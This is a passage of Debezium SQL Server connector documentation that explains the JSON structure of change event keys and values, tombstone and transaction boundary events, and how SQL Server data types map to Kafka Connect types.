deleted\n\n|6\n|`id`\n|Full identifier of the table that was created, altered, or dropped.\n\n|7\n|`table`\n|Represents table metadata after the applied change.\n\n|8\n|`primaryKeyColumnNames`\n|List of columns that compose the table's primary key.\n\n|9\n|`columns`\n|Metadata for each column in the changed table.\n\n|10\n|`attributes`\n|Custom attribute metadata for each table change.\n\n|===\n\nIn messages that the connector sends to the schema change topic, the key is the name of the database that contains the schema change.\nIn the following example, the `payload` field contains the key:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"databaseName\"\n }\n ],\n \"optional\": false,\n \"name\": \"io.debezium.connector.sqlserver.SchemaChangeKey\"\n },\n \"payload\": {\n \"databaseName\": \"testDB\"\n }\n}\n----\n\n\/\/ Type: assembly\n\/\/ ModuleID: descriptions-of-debezium-sql-server-connector-data-change-events\n\/\/ Title: Descriptions of {prodname} SQL Server connector data change events\n=== Data change events\n\nThe {prodname} SQL Server connector generates a data change event for each row-level `INSERT`, `UPDATE`, and `DELETE` operation. Each event contains a key and a value. The structure of the key and the value depends on the table that was changed.\n\n{prodname} and Kafka Connect are designed around _continuous streams of event messages_. However, the structure of these events may change over time, which can be difficult for consumers to handle. To address this, each event contains the schema for its content or, if you are using a schema registry, a schema ID that a consumer can use to obtain the schema from the registry. This makes each event self-contained.\n\nThe following skeleton JSON shows the basic four parts of a change event. However, how you configure the Kafka Connect converter that you choose to use in your application determines the representation of these four parts in change events. A `schema` field is in a change event only when you configure the converter to produce it. Likewise, the event key and event payload are in a change event only if you configure a converter to produce it. If you use the JSON converter and you configure it to produce all four basic change event parts, change events have this structure:\n\n[source,json,index=0]\n----\n{\n \"schema\": { \/\/ <1>\n ...\n },\n \"payload\": { \/\/ <2>\n ...\n },\n \"schema\": { \/\/ <3>\n ...\n },\n \"payload\": { \/\/ <4>\n ...\n },\n}\n----\n\n.Overview of change event basic content\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The first `schema` field is part of the event key. It specifies a Kafka Connect schema that describes what is in the event key's `payload` portion. In other words, the first `schema` field describes the structure of the primary key, or the unique key if the table does not have a primary key, for the table that was changed. +\n +\nIt is possible to override the table's primary key by setting the xref:{link-sqlserver-connector}#sqlserver-property-message-key-columns[`message.key.columns` connector configuration property]. In this case, the first schema field describes the structure of the key identified by that property.\n\n|2\n|`payload`\n|The first `payload` field is part of the event key. It has the structure described by the previous `schema` field and it contains the key for the row that was changed.\n\n|3\n|`schema`\n|The second `schema` field is part of the event value. It specifies the Kafka Connect schema that describes what is in the event value's `payload` portion. In other words, the second `schema` describes the structure of the row that was changed. Typically, this schema contains nested schemas.\n\n|4\n|`payload`\n|The second `payload` field is part of the event value. It has the structure described by the previous `schema` field and it contains the actual data for the row that was changed.\n\n|===\n\nBy default, the connector streams change event records to topics with names that are the same as the event's originating table. See xref:{link-sqlserver-connector}#sqlserver-topic-names[topic names].\n\n[WARNING]\n====\nThe SQL Server connector ensures that all Kafka Connect schema names adhere to the link:http:\/\/avro.apache.org\/docs\/current\/spec.html#names[Avro schema name format]. This means that the logical server name must start with a Latin letter or an underscore, that is, a-z, A-Z, or \\_. Each remaining character in the logical server name and each character in the database and table names must be a Latin letter, a digit, or an underscore, that is, a-z, A-Z, 0-9, or \\_. If there is an invalid character it is replaced with an underscore character.\n\nThis can lead to unexpected conflicts if the logical server name, a database name, or a table name contains invalid characters, and the only characters that distinguish names from one another are invalid and thus replaced with underscores.\n====\n\nifdef::product[]\n\nFor details about change events, see the following topics:\n\n* xref:about-keys-in-debezium-sql-server-change-events[]\n* xref:about-values-in-debezium-sql-server-change-events[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ ModuleID: about-keys-in-debezium-sql-server-change-events\n\/\/ Title: About keys in {prodname} SQL Server change events\n[[sqlserver-change-event-keys]]\n==== Change event keys\n\nA change event's key contains the schema for the changed table's key and the changed row's actual key. Both the schema and its corresponding payload contain a field for each column in the changed table's primary key (or unique key constraint) at the time the connector created the event.\n\nConsider the following `customers` table, which is followed by an example of a change event key for this table.\n\n.Example table\n[source,sql,indent=0]\n----\nCREATE TABLE customers (\n id INTEGER IDENTITY(1001,1) NOT NULL PRIMARY KEY,\n first_name VARCHAR(255) NOT NULL,\n last_name VARCHAR(255) NOT NULL,\n email VARCHAR(255) NOT NULL UNIQUE\n);\n----\n\n.Example change event key\nEvery change event that captures a change to the `customers` table has the same event key schema. For as long as the `customers` table has the previous definition, every change event that captures a change to the `customers` table has the following key structure, which in JSON, looks like this:\n\n[source,json,indent=0]\n----\n{\n \"schema\": { \/\/ <1>\n \"type\": \"struct\",\n \"fields\": [ \/\/ <2>\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"id\"\n }\n ],\n \"optional\": false, \/\/ <3>\n \"name\": \"server1.testDB.dbo.customers.Key\" \/\/ <4>\n },\n \"payload\": { \/\/ <5>\n \"id\": 1004\n }\n}\n----\n\n.Description of change event key\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The schema portion of the key specifies a Kafka Connect schema that describes what is in the key's `payload` portion.\n\n|2\n|`fields`\n|Specifies each field that is expected in the `payload`, including each field's name, type, and whether it is required. In this example, there is one required field named `id` of type `int32`.\n\n|3\n|`optional`\n|Indicates whether the event key must contain a value in its `payload` field. In this example, a value in the key's payload is required. A value in the key's payload field is optional when a table does not have a primary key.\n\n|4\n|`server1.dbo.testDB.customers.Key`\na|Name of the schema that defines the structure of the key's payload. This schema describes the structure of the primary key for the table that was changed. Key schema names have the format _connector-name_._database-schema-name_._table-name_.`Key`. In this example: +\n\n* `server1` is the name of the connector that generated this event. +\n* `dbo` is the database schema for the table that was changed. +\n* `customers` is the table that was updated.\n\n|5\n|`payload`\n|Contains the key for the row for which this change event was generated. In this example, the key, contains a single `id` field whose value is `1004`.\n\n|===\n\nifdef::community[]\n[NOTE]\n====\nAlthough the `column.exclude.list` and `column.include.list` connector configuration properties allow you to capture only a subset of table columns, all columns in a primary or unique key are always included in the event's key.\n====\n\n[WARNING]\n====\nIf the table does not have a primary or unique key, then the change event's key is null. This makes sense since the rows in a table without a primary or unique key constraint cannot be uniquely identified.\n====\nendif::community[]\n\n\n\/\/ Type: concept\n\/\/ ModuleID: about-values-in-debezium-sql-server-change-events\n\/\/ Title: About values in {prodname} SQL Server change events\n[[sqlserver-change-event-values]]\n==== Change event values\n\nThe value in a change event is a bit more complicated than the key. Like the key, the value has a `schema` section and a `payload` section. The `schema` section contains the schema that describes the `Envelope` structure of the `payload` section, including its nested fields. Change events for operations that create, update or delete data all have a value payload with an envelope structure.\n\nConsider the same sample table that was used to show an example of a change event key:\n\n[source,sql,indent=0]\n----\nCREATE TABLE customers (\n id INTEGER IDENTITY(1001,1) NOT NULL PRIMARY KEY,\n first_name VARCHAR(255) NOT NULL,\n last_name VARCHAR(255) NOT NULL,\n email VARCHAR(255) NOT NULL UNIQUE\n);\n----\n\nThe value portion of a change event for a change to this table is described for each event type.\n\nifdef::product[]\n\n* <<sqlserver-create-events,_create_ events>>\n* <<sqlserver-update-events,_update_ events>>\n* <<sqlserver-delete-events,_delete_ events>>\n\nendif::product[]\n\n[[sqlserver-create-events]]\n===== _create_ events\n\nThe following example shows the value portion of a change event that the connector generates for an operation that creates data in the `customers` table:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { \/\/ <1>\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"id\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"first_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"last_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"email\"\n }\n ],\n \"optional\": true,\n \"name\": \"server1.dbo.testDB.customers.Value\", \/\/ <2>\n \"field\": \"before\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"id\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"first_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"last_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"email\"\n }\n ],\n \"optional\": true,\n \"name\": \"server1.dbo.testDB.customers.Value\",\n \"field\": \"after\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"version\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"connector\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"name\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"ts_ms\"\n },\n {\n \"type\": \"boolean\",\n \"optional\": true,\n \"default\": false,\n \"field\": \"snapshot\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"db\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"schema\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"table\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"change_lsn\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"commit_lsn\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"event_serial_no\"\n }\n ],\n \"optional\": false,\n \"name\": \"io.debezium.connector.sqlserver.Source\", \/\/ <3>\n \"field\": \"source\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"op\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"ts_ms\"\n }\n ],\n \"optional\": false,\n \"name\": \"server1.dbo.testDB.customers.Envelope\" \/\/ <4>\n },\n \"payload\": { \/\/ <5>\n \"before\": null, \/\/ <6>\n \"after\": { \/\/ <7>\n \"id\": 1005,\n \"first_name\": \"john\",\n \"last_name\": \"doe\",\n \"email\": \"john.doe@example.org\"\n },\n \"source\": { \/\/ <8>\n \"version\": \"{debezium-version}\",\n \"connector\": \"sqlserver\",\n \"name\": \"server1\",\n \"ts_ms\": 1559729468470,\n \"snapshot\": false,\n \"db\": \"testDB\",\n \"schema\": \"dbo\",\n \"table\": \"customers\",\n \"change_lsn\": \"00000027:00000758:0003\",\n \"commit_lsn\": \"00000027:00000758:0005\",\n \"event_serial_no\": \"1\"\n },\n \"op\": \"c\", \/\/ <9>\n \"ts_ms\": 1559729471739 \/\/ <10>\n }\n}\n----\n\n\n.Descriptions of _create_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The value's schema, which describes the structure of the value's payload. A change event's value schema is the same in every change event that the connector generates for a particular table.\n\n|2\n|`name`\na|In the `schema` section, each `name` field specifies the schema for a field in the value's payload. +\n +\n`server1.dbo.testDB.customers.Value` is the schema for the payload's `before` and `after` fields. This schema is specific to the `customers` table. +\n +\n Names of schemas for `before` and `after` fields are of the form `_logicalName_._database-schemaName_._tableName_.Value`, which ensures that the schema name is unique in the database.\n This means that when using the xref:{link-avro-serialization}#avro-serialization[Avro converter], the resulting Avro schema for each table in each logical source has its own evolution and history.\n\n|3\n|`name`\na|`io.debezium.connector.sqlserver.Source` is the schema for the payload's `source` field. This schema is specific to the SQL Server connector. The connector uses it for all events that it generates.\n\n|4\n|`name`\na|`server1.dbo.testDB.customers.Envelope` is the schema for the overall structure of the payload, where `server1` is the connector name, `dbo` is the database schema name, and `customers` is the table.\n\n|5\n|`payload`\n|The value's actual data. This is the information that the change event is providing. +\n +\nIt may appear that the JSON representations of the events are much larger than the rows they describe. This is because the JSON representation must include the schema and the payload portions of the message.\nHowever, by using the xref:{link-avro-serialization}#avro-serialization[Avro converter], you can significantly decrease the size of the messages that the connector streams to Kafka topics.\n\n|6\n|`before`\n|An optional field that specifies the state of the row before the event occurred. When the `op` field is `c` for create, as it is in this example, the `before` field is `null` since this change event is for new content.\n\n|7\n|`after`\n|An optional field that specifies the state of the row after the event occurred. In this example, the `after` field contains the values of the new row's `id`, `first_name`, `last_name`, and `email` columns.\n\n|8\n|`source`\na|Mandatory field that describes the source metadata for the event. This field contains information that you can use to compare this event with other events, with regard to the origin of the events, the order in which the events occurred, and whether events were part of the same transaction. The source metadata includes:\n\n* {prodname} version\n* Connector type and name\n* Database and schema names\n* Timestamp for when the change was made in the database\n* If the event was part of a snapshot\n* Name of the table that contains the new row\n* Server log offsets\n\n|9\n|`op`\na|Mandatory string that describes the type of operation that caused the connector to generate the event. In this example, `c` indicates that the operation created a row. Valid values are:\n\n* `c` = create\n* `u` = update\n* `d` = delete\n* `r` = read (applies to only snapshots)\n\n|10\n|`ts_ms`\na| Optional field that displays the time at which the connector processed the event.\nIn the event message envelope, the time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time when a change was committed in the database.\nBy comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\n[[sqlserver-update-events]]\n===== _update_ events\n\nThe value of a change event for an update in the sample `customers` table has the same schema as a _create_ event for that table. Likewise, the event value's payload has the same structure. However, the event value payload contains different values in an _update_ event. Here is an example of a change event value in an event that the connector generates for an update in the `customers` table:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"before\": { \/\/ <1>\n \"id\": 1005,\n \"first_name\": \"john\",\n \"last_name\": \"doe\",\n \"email\": \"john.doe@example.org\"\n },\n \"after\": { \/\/ <2>\n \"id\": 1005,\n \"first_name\": \"john\",\n \"last_name\": \"doe\",\n \"email\": \"noreply@example.org\"\n },\n \"source\": { \/\/ <3>\n \"version\": \"{debezium-version}\",\n \"connector\": \"sqlserver\",\n \"name\": \"server1\",\n \"ts_ms\": 1559729995937,\n \"snapshot\": false,\n \"db\": \"testDB\",\n \"schema\": \"dbo\",\n \"table\": \"customers\",\n \"change_lsn\": \"00000027:00000ac0:0002\",\n \"commit_lsn\": \"00000027:00000ac0:0007\",\n \"event_serial_no\": \"2\"\n },\n \"op\": \"u\", \/\/ <4>\n \"ts_ms\": 1559729998706 \/\/ <5>\n }\n}\n----\n\n\n.Descriptions of _update_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\n|An optional field that specifies the state of the row before the event occurred. In an _update_ event value, the `before` field contains a field for each table column and the value that was in that column before the database commit. In this example, the `email` value is `john.doe@example.org.`\n\n|2\n|`after`\n| An optional field that specifies the state of the row after the event occurred. You can compare the `before` and `after` structures to determine what the update to this row was. In the example, the `email` value is now `noreply@example.org`.\n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. The `source` field structure has the same fields as in a _create_ event, but some values are different, for example, the sample _update_ event has a different offset. The source metadata includes:\n\n* {prodname} version\n* Connector type and name\n* Database and schema names\n* Timestamp for when the change was made in the database\n* If the event was part of a snapshot\n* Name of the table that contains the new row\n* Server log offsets\n\nThe `event_serial_no` field differentiates events that have the same commit and change LSN. Typical situations for when this field has a value other than `1`:\n\n* _update_ events have the value set to `2` because the update generates two events in the CDC change table of SQL Server (link:https:\/\/docs.microsoft.com\/en-us\/sql\/relational-databases\/system-tables\/cdc-capture-instance-ct-transact-sql?view=sql-server-2017[see the source documentation for details]). The first event contains the old values and the second contains contains new values. The connector uses values in the first event to create the second event. The connector drops the first event.\n\n* When a primary key is updated SQL Server emits two evemts. A _delete_ event for the removal of the record with the old primary key value and a _create_ event for the addition of the record with the new primary key.\nBoth operations share the same commit and change LSN and their event numbers are `1` and `2`, respectively.\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. In an _update_ event value, the `op` field value is `u`, signifying that this row changed because of an update.\n\n|5\n|`ts_ms`\na| Optional field that displays the time at which the connector processed the event.\nIn the event message envelope, the time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time when the change was committed to the database.\nBy comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\n[NOTE]\n====\nUpdating the columns for a row's primary\/unique key changes the value of the row's key. When a key changes, {prodname} outputs _three_ events: a _delete_ event and a xref:{link-sqlserver-connector}#sqlserver-tombstone-events[tombstone event] with the old key for the row, followed by a _create_ event with the new key for the row.\n====\n\n[[sqlserver-delete-events]]\n===== _delete_ events\n\nThe value in a _delete_ change event has the same `schema` portion as _create_ and _update_ events for the same table. The `payload` portion in a _delete_ event for the sample `customers` table looks like this:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n },\n \"payload\": {\n \"before\": { <>\n \"id\": 1005,\n \"first_name\": \"john\",\n \"last_name\": \"doe\",\n \"email\": \"noreply@example.org\"\n },\n \"after\": null, <2>\n \"source\": { <3>\n \"version\": \"{debezium-version}\",\n \"connector\": \"sqlserver\",\n \"name\": \"server1\",\n \"ts_ms\": 1559730445243,\n \"snapshot\": false,\n \"db\": \"testDB\",\n \"schema\": \"dbo\",\n \"table\": \"customers\",\n \"change_lsn\": \"00000027:00000db0:0005\",\n \"commit_lsn\": \"00000027:00000db0:0007\",\n \"event_serial_no\": \"1\"\n },\n \"op\": \"d\", <4>\n \"ts_ms\": 1559730450205 <5>\n }\n}\n----\n\n.Descriptions of _delete_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\n|Optional field that specifies the state of the row before the event occurred. In a _delete_ event value, the `before` field contains the values that were in the row before it was deleted with the database commit.\n\n|2\n|`after`\n| Optional field that specifies the state of the row after the event occurred. In a _delete_ event value, the `after` field is `null`, signifying that the row no longer exists.\n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. In a _delete_ event value, the `source` field structure is the same as for _create_ and _update_ events for the same table. Many `source` field values are also the same. In a _delete_ event value, the `ts_ms` and `pos` field values, as well as other values, might have changed. But the `source` field in a _delete_ event value provides the same metadata:\n\n* {prodname} version\n* Connector type and name\n* Database and schema names\n* Timestamp for when the change was made in the database\n* If the event was part of a snapshot\n* Name of the table that contains the new row\n* Server log offsets\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. The `op` field value is `d`, signifying that this row was deleted.\n\n|5\n|`ts_ms`\na| Optional field that displays the time at which the connector processed the event.\nIn the event message envelope, the time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database.\nBy comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\nSQL Server connector events are designed to work with link:{link-kafka-docs}\/#compaction[Kafka log compaction]. Log compaction enables removal of some older messages as long as at least the most recent message for every key is kept. This lets Kafka reclaim storage space while ensuring that the topic contains a complete data set and can be used for reloading key-based state.\n\n[[sqlserver-tombstone-events]]\n.Tombstone events\nWhen a row is deleted, the _delete_ event value still works with log compaction, because Kafka can remove all earlier messages that have that same key. However, for Kafka to remove all messages that have that same key, the message value must be `null`. To make this possible, after {prodname}\u2019s SQL Server connector emits a _delete_ event, the connector emits a special tombstone event that has the same key but a `null` value.\n\n\/\/ Type: assembly\n\/\/ ModuleID: debezium-sql-server-connector-generated-events-that-represent-transaction-boundaries\n\/\/ Title: {prodname} SQL Server connector-generated events that represent transaction boundaries\n[[sqlserver-transaction-metadata]]\n=== Transaction metadata\n\n{prodname} can generate events that represent transaction boundaries and that enrich data change event messages.\n\n[NOTE]\n.Limits on when {prodname} receives transaction metadata\n====\n{prodname} registers and receives metadata only for transactions that occur after you deploy the connector.\nMetadata for transactions that occur before you deploy the connector is not available.\n====\n\nDatabase transactions are represented by a statement block that is enclosed between the `BEGIN` and `END` keywords.\n{prodname} generates transaction boundary events for the `BEGIN` and `END` delimiters in every transaction.\nTransaction boundary events contain the following fields:\n\n`status`:: `BEGIN` or `END`.\n`id`:: String representation of the unique transaction identifier.\n`ts_ms`:: The time of a transaction boundary event (`BEGIN` or `END` event) at the data source.\nIf the data source does not provide {prodname} with the event time, then the field instead represents the time at which {prodname} processes the event.\n`event_count` (for `END` events):: Total number of events emmitted by the transaction.\n`data_collections` (for `END` events):: An array of pairs of `data_collection` and `event_count` elements that indicates the number of events that the connector emits for changes that originate from a data collection.\n\n[WARNING]\n====\nThere is no way for {prodname} to reliably identify when a transaction has ended.\nThe transaction `END` marker is thus emitted only after the first event of another transaction arrives.\nThis can lead to the delayed delivery of `END` marker in case of a low-traffic system.\n====\n\nThe following example shows a typical transaction boundary message:\n\n.Example: SQL Server connector transaction boundary event\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"status\": \"BEGIN\",\n \"id\": \"00000025:00000d08:0025\",\n \"ts_ms\": 1486500577125,\n \"event_count\": null,\n \"data_collections\": null\n}\n\n{\n \"status\": \"END\",\n \"id\": \"00000025:00000d08:0025\",\n \"ts_ms\": 1486500577691,\n \"event_count\": 2,\n \"data_collections\": [\n {\n \"data_collection\": \"testDB.dbo.testDB.tablea\",\n \"event_count\": 1\n },\n {\n \"data_collection\": \"testDB.dbo.testDB.tableb\",\n \"event_count\": 1\n }\n ]\n}\n----\n\nUnless overridden via the xref:sqlserver-property-topic-transaction[`topic.transaction`] option,\ntransaction events are written to the topic named xref:sqlserver-property-topic-prefix[`_<topic.prefix>_`]`.transaction`.\n\n\/\/Type: concept\n\/\/ModuleID: change-data-event-enrichment\n==== Change data event enrichment\n\nWhen transaction metadata is enabled, the data message `Envelope` is enriched with a new `transaction` field.\nThis field provides information about every event in the form of a composite of fields:\n\n`id`:: String representation of unique transaction identifier\n`total_order`:: The absolute position of the event among all events generated by the transaction\n`data_collection_order`:: The per-data collection position of the event among all events that were emitted by the transaction\n\nThe following example shows what a typical message looks like:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"before\": null,\n \"after\": {\n \"pk\": \"2\",\n \"aa\": \"1\"\n },\n \"source\": {\n...\n },\n \"op\": \"c\",\n \"ts_ms\": \"1580390884335\",\n \"transaction\": {\n \"id\": \"00000025:00000d08:0025\",\n \"total_order\": \"1\",\n \"data_collection_order\": \"1\"\n }\n}\n----\n\n\/\/ Type: reference\n\/\/ ModuleID: how-debezium-sql-server-connectors-map-data-types\n\/\/ Title: How {prodname} SQL Server connectors map data types\n[[sqlserver-data-types]]\n=== Data type mappings\n\nThe {prodname} SQL Server connector represents changes to table row data by producing events that are structured like the table in which the row exists.\nEach event contains fields to represent the column values for the row.\nThe way in which an event represents the column values for an operation depends on the SQL data type of the column.\nIn the event, the connector maps the fields for each SQL Server data type to both a _literal type_ and a _semantic type_.\n\nThe connector can map SQL Server data types to both _literal_ and _semantic_ types.\n\nLiteral type:: Describes how the value is literally represented by using Kafka Connect schema types, namely `INT8`, `INT16`, `INT32`, `INT64`, `FLOAT32`, `FLOAT64`, `BOOLEAN`, `STRING`, `BYTES`, `ARRAY`, `MAP`, and `STRUCT`.\nSemantic type:: Describes how the Kafka Connect schema captures the _meaning_ of the field using the name of the Kafka Connect schema for the field.\n\nIf the default data type conversions do not meet your needs, you can {link-prefix}:{link-custom-converters}#custom-converters[create a custom converter] for the connector.\n\nifdef::product[]\n\nFor more information about data type mappings, see the following sections:\n\n* xref:sql-server-basic-values[]\n* xref:sql-server-temporal-values[]\n* xref:sql-server-decimal-values[]\n* xref:sql-server-timestamp-values[]\n\nendif::product[]\n\n[id=\"sql-server-basic-values\"]\n==== Basic types\n\nThe following table shows how the connector maps basic SQL Server data types.\n\n.Data type mappings used by the SQL Server connector\n[cols=\"30%a,25%a,45%a\",options=\"header\"]\n|===\n|SQL Server data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`BIT`\n|`BOOLEAN`\n|n\/a\n\n|`TINYINT`\n|`INT16`\n|n\/a\n\n|`SMALLINT`\n|`INT16`\n|n\/a\n\n|`INT`\n|`INT32`\n|n\/a\n\n|`BIGINT`\n|`INT64`\n|n\/a\n\n|`REAL`\n|`FLOAT32`\n|n\/a\n\n|`FLOAT[(N)]`\n|`FLOAT64`\n|n\/a\n\n|`CHAR[(N)]`\n|`STRING`\n|n\/a\n\n|`VARCHAR[(N)]`\n|`STRING`\n|n\/a\n\n|`TEXT`\n|`STRING`\n|n\/a\n\n|`NCHAR[(N)]`\n|`STRING`\n|n\/a\n\n|`NVARCHAR[(N)]`\n|`STRING`\n|n\/a\n\n|`NTEXT`\n|`STRING`\n|n\/a\n\n|`XML`\n|`STRING`\n|`io.debezium.data.Xml` +\n +\nContains the string representation of an XML document\n\n|`DATETIMEOFFSET[(P)]`\n|`STRING`\n|`io.debezium.time.ZonedTimestamp` +\n +\nA string representation of a timestamp with timezone information, where the timezone is GMT\n\n|===\n\nOther data type mappings are described in the following sections.\n\nIf present, a column's default value is propagated to the corresponding field's Kafka Connect schema.\nChange messages will contain the field's default value\n(unless an explicit column value had been given), so there should rarely be the need to obtain the default value from the schema.\nifdef::community[]\nPassing the default value helps though with satisfying the compatibility rules when xref:{link-avro-serialization}[using Avro] as serialization format together with the Confluent schema registry.\nendif::community[]\n\n[[sql-server-temporal-values]]\n==== Temporal values\n\nOther than SQL Server's `DATETIMEOFFSET` data type (which contain time zone information), the other temporal types depend on the value of the `time.precision.mode` configuration property. When the `time.precision.mode` configuration property is set to `adaptive` (the default), then the connector will determine the literal type and semantic type for the temporal types based on the column's data type definition so that events _exactly_ represent the values in the database:\n\n[cols=\"30%a,25%a,45%a\",options=\"header\"]\n|===\n|SQL Server data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`DATE`\n|`INT32`\n|`io.debezium.time.Date` +\n +\nRepresents the number of days since the epoch.\n\n|`TIME(0)`, `TIME(1)`, `TIME(2)`, `TIME(3)`\n|`INT32`\n|`io.debezium.time.Time` +\n +\nRepresents the number of milliseconds past midnight, and does not include timezone information.\n\n|`TIME(4)`, `TIME(5)`, `TIME(6)`\n|`INT64`\n|`io.debezium.time.MicroTime` +\n +\nRepresents the number of microseconds past midnight, and does not include timezone information.\n\n|`TIME(7)`\n|`INT64`\n|`io.debezium.time.NanoTime` +\n +\nRepresents the number of nanoseconds past midnight, and does not include timezone information.\n\n|`DATETIME`\n|`INT64`\n|`io.debezium.time.Timestamp` +\n +\nRepresents the number of milliseconds past the epoch, and does not include timezone information.\n\n|`SMALLDATETIME`\n|`INT64`\n|`io.debezium.time.Timestamp` +\n +\nRepresents the number of milliseconds past the epoch, and does not include timezone information.\n\n|`DATETIME2(0)`, `DATETIME2(1)`, `DATETIME2(2)`, `DATETIME2(3)`\n|`INT64`\n|`io.debezium.time.Timestamp` +\n +\nRepresents the number of milliseconds past the epoch, and does not include timezone information.\n\n|`DATETIME2(4)`, `DATETIME2(5)`, `DATETIME2(6)`\n|`INT64`\n|`io.debezium.time.MicroTimestamp` +\n +\nRepresents the number of microseconds past the epoch, and does not include timezone information.\n\n|`DATETIME2(7)`\n|`INT64`\n|`io.debezium.time.NanoTimestamp` +\n +\nRepresents the number of nanoseconds past the epoch, and does not include timezone information.\n\n|===\n\nWhen the `time.precision.mode` configuration property is set to `connect`, then the connector will use the predefined Kafka Connect logical types. This may be useful when consumers only know about the built-in Kafka Connect logical types and are unable to handle variable-precision time values. On the other hand, since SQL Server supports tenth of microsecond precision, the events generated by a connector with the `connect` time precision mode will *result in a loss of precision* when the database column has a _fractional second precision_ value greater than 3:\n\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|SQL Server data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`DATE`\n|`INT32`\n|`org.apache.kafka.connect.data.Date` +\n +\nRepresents the number of days since the epoch.\n\n|`TIME([P])`\n|`INT64`\n|`org.apache.kafka.connect.data.Time` +\n +\nRepresents the number of milliseconds since midnight, and does not include timezone information. SQL Server allows `P` to be in the range 0-7 to store up to tenth of a microsecond precision, though this mode results in a loss of precision when `P` > 3.\n\n|`DATETIME`\n|`INT64`\n|`org.apache.kafka.connect.data.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information.\n\n|`SMALLDATETIME`\n|`INT64`\n|`org.apache.kafka.connect.data.Timestamp` +\n +\nRepresents the number of milliseconds past the epoch, and does not include timezone information.\n\n|`DATETIME2`\n|`INT64`\n|`org.apache.kafka.connect.data.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information. SQL Server allows `P` to be in the range 0-7 to store up to tenth of a microsecond precision, though this mode results in a loss of precision when `P` > 3.\n\n|===\n\n[[sql-server-timestamp-values]]\n===== Timestamp values\n\nThe `DATETIME`, `SMALLDATETIME` and `DATETIME2` types represent a timestamp without time zone information.\nSuch columns are converted into an equivalent Kafka Connect value based on UTC.\nSo for instance the `DATETIME2` value \"2018-06-20 15:13:16.945104\" is represented by a `io.debezium.time.MicroTimestamp` with the value \"1529507596945104\".\n\nNote that the timezone of the JVM running Kafka Connect and {prodname} does not affect this conversion.\n\n[id=\"sql-server-decimal-values\"]\n==== Decimal values\n\n{prodname} connectors handle decimals according to the setting of the xref:{link-sqlserver-connector}#sqlserver-property-decimal-handling-mode[`decimal.handling.mode` connector configuration property].\n\ndecimal.handling.mode=precise::\n+\n.Mappings when `decimal.handling.mode=precise`\n[cols=\"30%a,15%a,55%a\",options=\"header\",subs=\"+attributes\"]\n|===\n|SQL Server type\n|Literal type (schema type)\n|Semantic type (schema name)\n\n|`NUMERIC[(P[,S])]`\n|`BYTES`\na|`org.apache.kafka.connect.data.Decimal` +\nThe 